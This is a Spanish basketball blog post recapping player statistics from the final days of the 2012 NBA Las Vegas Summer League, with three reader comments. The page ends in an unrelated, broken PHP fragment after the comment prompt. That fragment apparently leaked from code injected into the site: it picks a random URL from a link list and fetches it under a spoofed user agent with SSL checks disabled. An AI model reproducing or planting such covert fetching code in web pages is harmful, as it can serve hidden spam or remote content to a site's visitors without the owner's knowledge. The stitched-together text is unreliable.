Las Vegas Summer League: Últimos días

23 de July de 2012 por txusma

Se acabó la Summerleague de la NBA. Mañana intentaremos dejaros un resumen de todo lo que han dado de sí estas dos semanas pero hoy repasaremos lo sucedido en los últimos tres días de la “competición”. La noticia más destacada ha sido que Damien Lillard no fue el máximo anotador de los Blazers en el último partido de la Summerleague, probablemente porque no llegó a vestirse de corto. De todas maneras no hizo falta porque se alzó con el MVP compartido con Josh Selby. ¡Empezamos!

Tony Wroten: El viernes y el sábado nos dejó dos actuaciones muy diferenciadas. En el primer partido se quedó en 6 puntos pero repartió 8 asistencias. En cambio, en el segundo se fue a los 19 puntos pero solo repartió 2 asistencias. Eso sí, el acierto en el tiro fue bastante deficiente en ambos casos. El domingo se quedó en un punto medio: 17 puntos, 4 asistencias y 3 robos.

Josh Selby: Una auténtica máquina de anotar que solo paró el último día. Si el viernes se fue a los 32 puntos con un buen 9 de 14 en tiros de campo y un 7 de 11 en triples, el sábado se quedó en 23 (con un 5 de 8 en triples) pero capturó 6 rebotes y repartió 6 asistencias. Finalmente, ayer se quedó en 11 puntos pero solo jugó 20 minutos. Eso sí, le dio tiempo a repartir 6 asistencias.

Damian Lillard: Como os comentamos anteriormente, los Blazers jugaron dos partidos pero Lillard no participó en el segundo. Obviamente, fue el mejor de su equipo en el primero con 23 puntos, 7 asistencias.

Will Barton: Apuntemos el nombre de este escolta que a largo plazo puede dar que hablar. Tampoco participó en el último partido pero en el primero fue el compañero perfecto de Lillard con 21 puntos (8 de 11) y 9 rebotes.

Meyers Leonard: También descansó el último día. Antes, nos dejó una actuación de 11 puntos y 5 rebotes.

Evan Fournier: Acabó su participación en la Summerleague con 17 puntos pero sin coger un solo rebote ni dar ni una sola asistencia.

Tyler Zeller: En 13 minutos tuvo tiempo de anotar 12 puntos, capturar 5 rebotes y robar un par de balones.

Tristan Thompson: Jugó sólo 12 minutos y tuvo suficiente para anotar 12 puntos. Él y Zeller no tuvieron rival en el último partido de los Cavs.

Kemba Walker: Su última actuación fue una a la que ya nos tiene acostumbrados: 16 puntos con un 6 de 17. Lo peor es que no repartió ni una asistencia.

Bismack Biyombo: 10 puntos y 4 rebotes en 22 minutos de juego. Eso sí, y tres chapas de regalo marca de la casa.

Terrel Harris: El escolta de los Heat se despidió con su mejor partido. 25 puntos con un 8 de 10.

Cory Joseph: El viernes perdió más balones que puntos anotó (10 vs 9), pero el sábado volvió a dejar muestras de lo que puede aportar. Ante los Mavs consiguió 18 puntos, 7 rebotes, 5 asistencias y 2 robos.

Harrison Barnes: Estuvo muy bien el viernes (20 puntos, 9 rebotes, 2 robos, 0 pérdidas) pero mucho más flojo el sábado. Ha aguantado bien el trote.

Jae Crowder: Nombrado desde ya uno de mis jugadores favoritos. El viernes fueron 18 puntos, 4 rebotes, 2 asistencias, 3 robos y 2 tapones y el sábado 21 puntos y 6 rebotes. Lo espectacular es que ha conseguido en estos dos partidos un 6 de 13 en triples, algo que no está nada mal para un jugador que en teoría no sabía tirar de fuera.

Derrick Williams: ¡Aleluya! ¡Metió un triple! Acabó con un 4 de 8 en tiros de campo, 15 puntos, 4 rebotes y 2 robos.

Wes Johnson: ¿Eres el verdadero Wes Johnson? ¿El que asombraba en Syracuse? Si no lo es, con 28 puntos estuvo a punto de engañarnos.

Adam Morrison: Los blancos aún la saben meter. 18 puntos y 3 triples el sábado y 26 puntos y 4 triples el domingo. Se ha ganado a pulso que un equipo confíe en él como cañonero eventual.

Tobias Harris: El show Tobias no ha parado el fin de semana. El sábado consiguió 22 puntos, 7 rebotes y no le tembló el pulso al tener que anotar los dos tiros libres que daban la victoria a su equipo. Ayer se despidió de la summerleague con 18 puntos, 3 rebotes y 2 tapones en 20 minutos de juego.

John Henson: ¡Qué buenas sensaciones ha dejado Henson! El sábado también anotó 22 puntos y además capturó 9 rebotes y repartió 4 asistencias. Ayer, en 20  minutos se fue a los 16 puntos, tras fallar tan solo 1 de sus 9 lanzamientos.

Jared Sullinger: Mal un día más en el tiro el sábado (3 de 11). Acabó con 16 puntos y 11 rebotes. Ayer, jugó 18 minutos en los que dispuso de 10 lanzamientos y se fue a los 13 puntos.

Comenta

3 comentarios a esta entrada

  1. amunikes dice:
    #1

    que se sabe de perry jones??

      Citar

  2. Esteban dice:
    #2

    salio en eln segundo juego por una lesion y no volvio, en el primero habia hecho cosas realemente buenas

    selby es un interesante jugador, una pena que disponga de tan pocos minutos en menphis, me gustaria verlo en los bobcats donde tendria suficientes minutos para desplegar su juego

    morrison volvio! bien lo dice el analisis, puede ser el cañonero eventual, un rol similar al de michael reed en la actualidad

      Citar

  3. Joaq dice:
    #3

    Se vienen los Olimpicos… guardaron en archivos los analisis basketbolisticos? Jejeje.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>